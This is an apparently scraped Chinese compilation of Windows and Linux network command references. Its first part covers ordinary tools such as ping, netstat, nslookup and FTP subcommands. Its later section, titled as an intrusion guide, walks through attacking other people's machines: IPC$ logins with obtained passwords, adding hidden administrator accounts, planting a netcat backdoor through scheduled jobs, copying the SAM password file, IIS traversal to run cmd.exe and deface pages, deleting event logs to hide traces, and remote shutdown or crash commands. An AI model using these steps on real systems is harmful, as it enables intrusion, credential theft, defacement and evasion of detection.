网络命令行集锦常用CMD命令

网络命令行集锦常用CMD命令

1.最基本，最常用的，测试物理网络的

ping 192.168.10.88 －t ，参数－t是等待用户去中断测试

2.查看DNS、IP、Mac等

A.Win98：winipcfg

B.Win2000以上：Ipconfig/all

C.NSLOOKUP：如查看河北的DNS

C:\>nslookup

Default Server: https://www.wendangku.net/doc/cc11050428.html,

Address: 202.99.160.68

>server 202.99.41.2 则将DNS改为了41.2

> https://www.wendangku.net/doc/cc11050428.html,

Server: https://www.wendangku.net/doc/cc11050428.html,

Address: 202.99.160.68

Non-authoritative answer:

Name: https://www.wendangku.net/doc/cc11050428.html,

Address: 202.99.160.212

3.网络信使

Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段

net stop messenger 停止信使服务，也可以在面板－服务修改

net start messenger 开始信使服务

4.探测对方对方计算机名，所在的组、域及当前用户名

ping －a IP －t ，只显示NetBios名

nbtstat -a 192.168.10.146 比较全的

https://www.wendangku.net/doc/cc11050428.html,stat -a 显示出你的计算机当前所开放的所有端口

netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和IP的统计等6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址

arp -a

7.在代理服务器端

捆绑IP和MAC地址，解决局域网内盗用IP：

ARP －s 192.168.10.59 00－50－ff－6c－08－75

解除网卡的IP与MAC地址的绑定：

arp -d 网卡IP

8.在网络邻居上隐藏你的计算机

net config server /hidden:yes

net config server /hidden:no 则为开启

9.几个net命令

A.显示当前工作组服务器列表net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。

比如：查看这个IP上的共享资源，就可以

C:\>net view 192.168.10.8

在192.168.10.8 的共享资源

资源共享名类型用途注释

网站服务Disk

命令成功完成。

B.查看计算机上的用户帐号列表net user

C.查看网络链接net use

例如：net use z: [url=file://\\192.168.10.8\movie]\\192.168.10.8\movie[/url] 将这个IP的movie共享目录映射为本地的Z盘

D.记录链接net session

例如：

C:\>net session

计算机用户名客户类型打开空闲时间

[url=file://\\192.168.10.110]\\192.168.10.110[/url] ROME Windows 2000 2195 0 00:03:12

[url=file://\\192.168.10.51]\\192.168.10.51[/url] ROME Windows 2000 2195 0 00:00:39

命令成功完成。

10.路由跟踪命令

A.tracert https://www.wendangku.net/doc/cc11050428.html,

B.pathping https://www.wendangku.net/doc/cc11050428.html, 除了显示路由外，还提供325S的分析，计算丢失包的%

11.关于共享安全的几个命令

A.查看你机器的共享资源net share

B.手工删除共享

net share c$ /d

net share d$ /d

net share ipc$ /d

net share admin$ /d

注意$后有空格。

C.增加一个共享：

c:\net share mymovie=e:\downloads\movie /users:1

mymovie 共享成功。

同时限制链接用户数为1人。

12.在DOS行下设置静态IP

A.设置静态IP

CMD

netsh

netsh>int

interface>ip

interface ip>set add "本地链接" static IP地址mask gateway

B.查看IP设置

interface ip>show address

测试mtu

ping -f -l size 服务器ip

偶们最常用咯^_^

netstat命令

netstat命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。

该命令的一般格式为：

netstat [选项]

命令中各选项的含义如下：

-a 显示所有socket，包括正在监听的。

-c 每隔1秒就重新显示一遍，直到用户中断它。

-i 显示所有网络接口的信息，格式同“ipconfig -e”。

-n 以网络IP地址代替名称，显示出网络连接情形。

-r 显示核心路由表，格式同“route -e”。

-t 显示TCP协议的连接情况。

-u 显示UDP协议的连接情况。

-v 显示正在进行的工作。

[例]在本地机上使用netstat命令。

$ netstat

Active Internet connections （w/o servers）

Proto Recv-Q Send-Q Local Address Foreign Address State

Active UNIX domain sockets （w/o servers）

Proto RefCnt Flags Type State I-Node Path

unix 1 [ ] STREAM CONNECTED 270 @00000008

unix 1 [ ] STREAM CONNECTED 150 @00000002

unix 1 [ ] STREAM CONNECTED 104 @00000001

unix 1 [ ] STREAM CONNECTED 222 @00000004

unix 1 [ ] STREAM CONNECTED 171 @00000003

unix 1 [ ] STREAM CONNECTED 271 /dev/log

unix 1 [ ] STREAM CONNECTED 225 /dev/log

unix 1 [ ] STREAM CONNECTED 223 /dev/log

unix 1 [ ] STREAM CONNECTED 203 /dev/log

unix 1 [ ] STREAM CONNECTED 105 /dev/log

……

nslookup命令

nslookup命令的功能是查询一台机器的IP地址和其对应的域名。它通常需要一台域名服务器来提供域名服务。如果用户已经设置好域名服务器，就可以用这个命令查看不同主机的IP地址对应的域名。

该命令的一般格式为：

nslookup [IP地址/域名]

[例]在本地机上使用nslookup命令。

$ nslookup

Default Server: https://www.wendangku.net/doc/cc11050428.html,

Address: 192.168.1.99

>

在符号“>”后面输入要查询的IP地址或域名并回车即可。如果要退出该命令，输入

exit并回车即可。

finger命令

finger命令的功能是查询用户的信息，通常会显示系统中某个用户的用户名、主目录、停滞时间、登录时间、登录shell等信息。如果要查询远程机上的用户信息，需要在用户名后面接“@主机名”，采用[用户名@主机名]的格式，不过要查询的网络主机需要运行finger 守护进程。

该命令的一般格式为：

finger [选项] [使用者] [用户@主机]

命令中各选项的含义如下：

-s 显示用户的注册名、实际姓名、终端名称、写状态、停滞时间、登录时间等信息。

-l 除了用-s选项显示的信息外，还显示用户主目录、登录shell、邮件状态等信息，以及用户主目录下的.plan、.project和.forward文件的内容。

-p 除了不显示.plan文件和.project文件以外，与-l选项相同。

[例]在本地机上使用finger命令。

$ finger xxq

Login: xxq Name:

Directory: /home/xxq Shell: /bin/bash

Last login Thu Jan 1 21:43 （CST）on tty1

No mail.

No Plan.

$ finger

Login Name Tty Idle Login Time Office Office Phone

root root *1 28 Nov 25 09:17

……

ping命令

ping命令用于查看网络上的主机是否在工作，它向该主机发送ICMP ECHO_REQUEST 包。有时我们想从网络上的某台主机上下载文件，可是又不知道那台主机是否开着，就需要使用ping命令查看。

该命令的一般格式为：

ping [选项] 主机名/IP地址

命令中各选项的含义如下：

-c 数目在发送指定数目的包后停止。

-d 设定SO_DEBUG的选项。

-f 大量且快速地送网络封包给一台机器，看它的回应。

-I 秒数设定间隔几秒送一个网络封包给一台机器，预设值是一秒送一次。

-l 次数在指定次数内，以最快的方式送封包数据到指定机器（只有超级用户可以使用此

选项）。

-q 不显示任何传送封包的信息，只显示最后的结果。

-r 不经由网关而直接送封包到一台机器，通常是查看本机的网络接口是否有问题。

-s 字节数指定发送的数据字节数，预设值是56，加上8字节的ICMP头，一共是64ICMP 数据字节。

TurboLinux系统提供了大量命令和许多实用工具软件，本书由于篇幅的关系，主要介

绍了TurboLinux的一些常用命令和实用软件。读者可以使用系统提供的联机帮助手册获取更多的信息。

TurboLinux系统的联机手册中有大量的可用信息，根据其内容分成若干节。在Linux 联机帮助手册上，几乎每个命令都有说明。因此，当用户对于Linux上的一个命令不会用或是不太了解时，就请使用联机帮助命令。

本章主要介绍几个常用的联机帮助命令。包括：

man 查询每个命令的使用方法

help 查询Shell命令

whereis 查询某个命令的位置

locate 查询某个文件的位置

man命令

这个命令应该是每个Linux系统上都有的。它格式化并显示在线的手册页。通常使用者只要在命令man后，输入想要获取的命令的名称（例如ls），man就会列出一份完整的说明，其内容包括命令语法、各选项的意义以及相关命令等。

该命令的一般形式为：

man [选项] 命令名称

命令中各选项的含义分别为：

-M 路径指定搜索man手册页的路径，通常这个路径由环境变量MANPATH预设，如果在命令行上指定另外的路径，则覆盖MANPATH的设定。

-P 命令指定所使用的分页程序，缺省使用/usr/bin/less-is，在环境变量MANPAGER中预设。

-S 章节由于一个命令名称可能会有很多类别，至于类别，列出如下：

章节说明

1 一般使用者的命令

2 系统调用的命令

3 C语言函数库的命令

4 有关驱动程序和系统设备的解释

5 配置文件的解释

6 游戏程序的命令

7 其他的软件或是程序的命令

有关系统维护的命令

-a 显示所有的手册页，而不是只显示第一个。

-d 这个选项主要在检查时使用，如果用户加入了一个新的文件，就可以用这个选项检查是否出错，这个选项并不会列出文件内容。

-f 只显示出命令的功能而不显示其中详细的说明文件。

-p string 设定运行的预先处理程序的顺序，共有下列几项：

e eqn t tbl

g grap r refer

p pic v vgrind

-w 不显示手册页，只显示将被格式化和显示的文件所在位置。

例如：查看cd命令的使用方法。

$ man cd

cd（n）Tcl Built-In Commands cd（n）

_________________________________________________________________ NAME

cd - Change working directory

SYNOPSIS

cd ?dirName?

_________________________________________________________________ DEs criptION

Change the current working directory to dirName, or to the

home directory （as specified in the HOME environment vari-able）if dirName is not given. Returns an empty string.

KEYWORDS

working directory

Tcl 1

（END）

可以按q键退出man命令。

help命令

help命令用于查看所有Shell命令。用户可以通过该命令寻求Shell命令的用法，只需在所查找的命令后输入help命令，就可以看到所查命令的内容了。

例如：查看od命令的使用方法。

$ od --help

whereis命令

这个程序的主要功能是寻找一个命令所在的位置。例如，我们最常用的ls命令，它是在/bin这个目录下的。如果希望知道某个命令存在哪一个目录下，可以用whereis命令来查询。

该命令的一般形式为：

whereis [选项] 命令名[/red]

说明：一般直接使用不加选项的whereis命令，但用户也可根据特殊需要选用它的一些选项。

该命令中各选项的含义分别为：

b 只查找二进制文件

m 查找主要文件

s 查找来源

u 查找不常用的记录文件

例如：查找ls命令在什么目录下。

$ whereis ls

ls:/bin/ls/usr/man/man1/ls.1

FTP命令行使用精萃

FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用FTP，都会遇到大量的FTP内部命令。熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。

先说说他的功能吧，主要就是从运行FTP服务器的计算机传输文件。可以交互使用。

这里要注意，只有安装了tcp/ip协议的机器才能使用ftp命令。

FTP的命令行格式为：ftp [-v][-d][-i][-n][-g][-s:filename][-a][-w:windowsize][computer]

说说他们的含义吧。

-v 不显示远程服务器响应

-n 禁止第一次连接的时候自动登陆

-i 在多个文件传输期间关闭交互提示

-d 允许调试、显示客户机和服务器之间传递的全部ftp命令

-g 不允许使用文件名通配符，文件名通配符的意思是说允许在本地文件以及路径名中使用通配字符

-s:filename 指定包含ftp命令的文本文件。在ftp命令启动后将自动运行这些命令。在加的参数里不能有空格。

-a 绑定数据连接时，使用任何的本地端口

-w:windowsize 忽略默认的4096传输缓冲区

computer 指定要连接的远程计算机的ip地址

ftp使用的内部命令如下(中括号表示可选项):

1. ![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip。

2. $ macro-ame[args]：执行宏定义macro-name。

3. account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。

4. append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5. ascii：使用ascii类型传输方式。

6. bell：每个命令执行完毕后计算机响铃一次。

7. bin：使用二进制文件传输方式。

8. bye：退出ftp会话过程。

9. case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10. cd remote-dir：进入远程主机目录。

11. cdup：进入远程主机目录的父目录。

12. chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out 。

13. close：中断与远程服务器的ftp会话(与open对应)。

14. cr：使用asscii方式传输文件时，将回车换行转换为回行。

15. delete remote-file：删除远程主机文件。

16. debug[debug-value]：设置调试方式，显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

17. dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件local-file。

18. disconnection：同close。

19. form format：将文件传输方式设置为format，缺省为file方式。

20. get remote-file[local-file]：将远程主机的文件remote-file传至本地硬盘的local-file。

21. glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。

22. hash：每传输1024字节，显示一个hash符号(#)。

23. help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。

24. idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。

25. image：设置二进制传输方式(同binary)。

26. lcd[dir]：将本地工作目录切换至dir。

27. ls[remote-dir][local-file]：显示远程目录remote-dir，并存入本地文件local-file。

28. macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29. mdelete[remote-file]：删除远程主机文件。

30. mdir remote-files local-file：与dir类似，但可指定多个远程文件，如：mdir *.o.*.zipoutfile 。

31. mget remote-files：传输多个远程文件。

32. mkdir dir-name：在远程主机中建一目录。

33. mls remote-file local-file：同nlist，但可指定多个文件名。

34. mode[modename]：将文件传输方式设置为modename，缺省为stream方式。

35. modtime file-name：显示远程主机文件的最后修改时间。

36. mput local-file：将多个文件传输至远程主机。

37. newer file-name：如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。

38. nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39. nmap[inpattern outpattern]：设置文件名映射机制，使得文件传输时，文件中的某些字符相互转换，如：nmap ?.ū.ū[?，ū].[ū，ū]，则传输文件a1.a2.a3时，文件名变为a1，a2。该命令特别适用于远程主机为非UNIX机的情况。

40. ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

41. open host[port]：建立指定ftp服务器连接，可指定连接端口。

42. passive：进入被动传输方式。

43. prompt：设置多个文件传输时的交互提示。

44. proxy ftp-cmd：在次要控制连接中，执行一条ftp命令，该命令允许连接两个ftp 服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。

45. put local-file[remote-file]：将本地文件local-file传送至远程主机。

46. pwd：显示远程主机的当前工作目录。

47. quit：同bye，退出ftp会话。

48. quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst。

49. recv remote-file[local-file]：同get。

50. reget remote-file[local-file]：类似于get，但若local-file存在，则从上次传输中断处续传。

51. rhelp[cmd-name]：请求获得远程主机的帮助。

52. rstatus[file-name]：若未指定文件名，则显示远程主机的状态，否则显示文件状态。

53. rename[from][to]：更改远程主机文件名。

54. reset：清除回答队列。

55. restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。

56. rmdir dir-name：删除远程主机目录。

57. runique：设置文件名唯一性存储。

58. send local-file[remote-file]：同put。

59. sendport：设置PORT命令的使用。

60. site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。

61. size file-name：显示远程主机文件大小，如：site idle 7200。

62. status：显示当前ftp状态。

63. struct[struct-name]：将文件传输结构设置为struct-name，缺省时使用stream结构。

64. sunique：将远程主机文件名存储设置为唯一(与runique对应)。

65. system：显示远程主机的操作系统类型。

66. tenex：将文件传输类型设置为TENEX机的所需的类型。

67. tick：设置传输时的字节计数器。

68. trace：设置包跟踪。

69. type[type-name]：设置文件传输类型为type-name，缺省为ascii，如：type binary，设置二进制传输方式。

70. umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3。

71. user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous [url=mailto:my@email]my@email[/url]。

72. verbose：同命令行的-v参数，即设置详尽报告方式，ftp服务器的所有响应都将显示给用户，缺省为on。

73. ?[cmd]：同help。

FTP >mget 使用当前文件传送类型将远程文件复制到本地计算机。

格式：mget remote-files [ ...]

说明：remote-files 指定要复制到本地计算机的远程文件。

FTP >mput 使用当前文件传送类型将本地文件复制到远程计算机上。

格式：mput local-files [ ...]

说明：local-files 指定要复制到远程计算机的本地文件

---------------------------------------------------------------

get remote－file[local－file]

将远程主机的文件remote－file传至本地硬盘的local－file。

---------------------------------------------------------------

直接的命令没有，只有使用小猫的方法倒两次。

入侵命令详解

1：NET

只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！

这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1

net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] 123456 /user:hbx null密码为空退出的命令是

net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] /delete

net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\winnt\system32 这样这个机器就有了一个名为me的共享目录，而打开它就是winnt 下的system32目录，如果你用win2000的系统就知这个目录有多重要了，如果不想要也好办net share me /delete 呵呵，没有了，是不是很方便的啊。

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功，那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c$

net start telnet

这样可以打开对方的TELNET服务.

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes

net user guest /active:no这样这个guest的用户就又被禁用了

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net user guest lovechina

有人问到提高权限的问题下面就解决下

net localgroup administrators guest /add

将guest变为administrator

net命令果然强大啊！

net view命令看对方开了共享

net user是查看所有用户列表，看看哪个用户是和你一样偷跑进来的，给他名给删掉，让他美，

net user 用户名/delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛

net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户，因为这个是创建系统时建出来的，所以要看看他的系统是什么时间创建出来的

net user administrator，然后再查看别的管理员用户是什么时间创建的，如果相差太远，那可能是被别人偷偷跑来偷建的，一律del，安全第一哦................

2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

那么需要用AT命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，

net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]

将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其ID=1

at [url=file://\\127.0.0.1]\\127.0.0.1[/url] 12:3 nc.exe

这里假设了一个木马，名为NC.EXE，这个东西要在对方服务器上.

这里介绍一下NC，NC是NETCAT的简称，为了方便输入，一般会被改名.它是一个TELNET 服务，端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

at命令功能强大,下面可以打个比方:

C:\> AT 22:30 Start C:\prettyboy.mp3

新加了一项作业，其作业ID = 1 [现在我们新建立了一个任务在22:30分系统将自动播放歌曲]

3:telnet

这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上，你可以去申请个支持FTP上传的空间，国内多的是，如果真的找不到，我给

https://www.wendangku.net/doc/cc11050428.html,，不错的.当我们申?.. 约癋TP服务器.

在上传前需要登陆先，这里我们假设FTP服务器

https://www.wendangku.net/doc/cc11050428.html,，用户名是HUCJS，密码是654321

ftp

https://www.wendangku.net/doc/cc11050428.html,

他会要求输入用户，成功后会要求输入密码.

下面先说上传，假设你需上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\

get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM，下到你的机子的D盘下

put c:\index.htm d:\

这里的问题是两个命令的解释正好弄反了，登陆ＦＴＰ服务器后get才是下载，而put命令是上传，这和tftp的命令正好相反，在tftp命令里get是上传put是下载，这下明白了吧，而且在ＦＴＰ服务器中不能用c:\和d:\这样来指明路径，这也是在tftp里面用的方法，FTP 可不会执行的，不信你去试好了，正确应该这样上传文件put index.htm这样就足够了，装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下，不喜欢就del index.htm 删掉这文件，下载时先查看一下目录，dir然后看这个目录里有什么，有你要的你就get index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。

get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）"

这句的解释里就没有出现错误，呵呵，看来那以前的还是马虎所至吧

好了，总算找出错处了吧，再说下面吧。

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm [url=file://\\127.0.0.1\c$\index.htm]\\127.0.0.1\c$\index.htm[/url]

如果你要复制到D盘下把C改为D，就行了！

copy index.htm [url=file://\\127.0.0.1\d$\index.htm]\\127.0.0.1\d$\index.htm[/url]

如果你要把他复制到WINNT 目录里

就要把输入

copy index.htm [url=file://\\127.0.0.1\admin$\index.htm]\\127.0.0.1\admin$\index.htm[/url]

admin$是winnt

要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy [url=file://\\127.0.0.1\admin$\repair\sam]\\127.0.0.1\admin$\repair\sam[/url]._

c:\

这个sam._这明显是NT主机的口令档，如果是win2000机器的口令文件应该是sam 6：set

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！

下面是我得到的结果！我来分析它，只是找主页在那而已。

COMPUTERNAME=PENTIUMII

ComSpec=D:\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了

HTTP_ACCEPT_ENCODING=gzip，deflate

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1

Os2LibPath=D:\WINNT\system32\os2\dll;

OS=Windows_NT

Path=D:\WINNT\system32;D:\WINNT

PATHEXT=.COM;.EXE;.BAT;.CMD

PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3，GenuineIntel PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0303

PROMPT=$P$G

QUERY_STRING=/c+set

REMOTE_ADDR=XX.XX.XX.XX

REMOTE_HOST=XX.XX.XX.XX

REQUEST_METHOD=GET

SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe

SERVER_NAME=XX.XX.XX.XX

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1.1

SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0

SystemDrive=D:

SystemRoot=D:\WINNT

TZ=GMT-9

USERPROFILE=D:\WINNT\Profiles\Default User

windir=D:\WINNT

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用

这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。

7：nbtstat

如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

这个我认为大不大写没有太大差别，用处还是一样的。

之后用net use \\对方IP 连接一下！

net view \\对方IP 查看对方共享文件夹

net use X: [url=file://\\IP\]\\IP\[/url]对方共享文件映射对方共享文件夹成为本机的X盘这就是139端口的基本用法！不过前提是必须对方开共享！

netstat -n看看谁连接你

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status

Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered

MAC Address = 00-E0-29-14-35-BA

PENTIUMII UNIQUE

PENTIUMII UNIQUE

ORAHOTOWN GROUP

ORAHOTOWN GROUP

ORAHOTOWN UNIQUE

PENTIUMII UNIQUE

INet~Services GROUP

IS~PENTIUMII... UNIQUE

ORAHOTOWN GROUP

ORAHOTOWN UNIQUE

..__MSBROWSE__. GROUP

粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是的话，那他前面的就是用户. 这里的用户是PENTIUMII。

没有03说明:MAC没和IP捆在一起了

8：Shutdown

关了对方的NT服务器的命令

Shutdown [url=file://\\IP]\\IP[/url]地址t:20

20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。

Telnet进去用命令或者是本地用什么软件重启对方电脑

shutdown -m \\计算机名称可以远程重起或关闭的

9：DIR

这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10：echo

著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm

第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。

这里说明一下，是重定向命令只是一个是输入重定向另一个是输出重定向，比如我们在命令提示符下就会显示c:\>这个意思就是把C盘的命令权重定向给我们，同样：也是定向的命令也叫作管道，它是用来连接两个命令的管道，先执行管道左边的命令，再执行管道右边的命令，不过我是没能耐把DOS命令说明白的，想研究就买本dos大全看吧，够看半年的了。

大家可以本地试下。

可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。

1、首先，我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）

open https://www.wendangku.net/doc/cc11050428.html,（你的FTP服务器，申请时你的空间提供商会给你的）cnhack（你申请时的用户名）

test（你申请时的密码）

get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）

bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）

具体的做法：

输入echo open https://www.wendangku.net/doc/cc11050428.html,> c:\cnhack.txt

输入echo cnhack >> c:\cnhack.txt

输入echo 39abs >> c:\cnhack.txt

输入echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt

最后输入ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）

等命令完成时，文件已经下载到你指定的文件里了。

注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）记得要del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

attrib这个命令先要用来查属性，比如attrib 文件名，这样就显示出这个文件的属性了，它不止有R这个属性，其实一共有四种属性， a 档案属性r 只读属性h隐含属性s系统属性，我们想用哪个就用哪个，我觉得把我们上传的文件加个隐含属性更有意思，，，，，继续挑那贴的错.

12:del

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志

Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志

Scheduler服务日志默认位置：%systemroot%\schedlgu.txt

以上日志在注册表里的键：

应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog

有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。

Schedluler服务日志在注册表中

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

del确实是删除文件用的，log也确实是日志文件类型，不过按上面这种方法是不可能清理掉你自身的日志的，因为系统自动运行着日志记录，你在做这些时它一直都在记录着，并没有停止，大家也会常看到，有时删除某个文件时会提示系统正在占用拒绝删除的，呵呵，这就明白了，系统正在运行的东西已经驻留内存里，当然不能这样删除掉了，大家怕了吧，这样删等于帮别人清理了日志，没删自己那份啊，哈哈哈哈，要问我怎么清理，我只说大家还是用小榕的工具来清吧，那个又快又好，我们何必去用那些烦琐的命令行呢，尤其对生长在windows桌面操作下的人们那显然是太麻烦了，我推荐小榕的elsave工具，清理日志又快又干净，还省电呢，嘻嘻，我可不是做广告来的。

借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件，

使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use [url=file://\\ip]\\ip[/url] pass /us

er: user

然后命令行下：elsave -s [url=file://\\ip]\\ip[/url] -l application -C，这样就删除了安全日志。其实利用这个软件还可以进行备份日志，只要加一个参数-f filename就可以了，在此不再详述。

局域网要别人死机? 他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入\\他的IP或机器名\c\con\con

CMD(网络命令大全)

